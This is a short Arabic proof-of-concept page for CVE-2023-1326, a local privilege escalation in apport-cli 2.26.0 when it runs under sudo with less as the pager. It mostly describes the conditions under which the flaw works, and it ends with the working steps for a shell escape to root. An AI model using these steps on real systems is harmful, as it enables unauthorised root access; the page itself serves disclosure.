
استغلال إثبات المفهوم لـ CVE-2023-1326، وهو ثغرة تصعيد الامتيازات في apport-cli 2.26.0 عند تكوينه مع sudo و less كصفحة.
إثبات مفهوم لـ CVE-2023-1326 في apport-cli 2.26.0
هذه الثغرة هي تصعيد امتيازات في apport-cli 2.26.0، مشابهة لـ CVE-2023-26604، تعمل هذه الثغرة فقط إذا تم تعيينها في sudoers:

تم العثور على هجوم تصعيد امتيازات في apport-cli 2.26.0 والإصدارات السابقة وهو مشابه لـ CVE-2023-26604. إذا تم تكوين النظام بشكل خاص للسماح للمستخدمين غير المميزين بتشغيل sudo apport-cli، وتم تكوين less كصفحة، ويمكن ضبط حجم المحطة الطرفية: يمكن لمهاجم محلي تصعيد الامتيازات.
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
press V (view report)
!/bin/bash
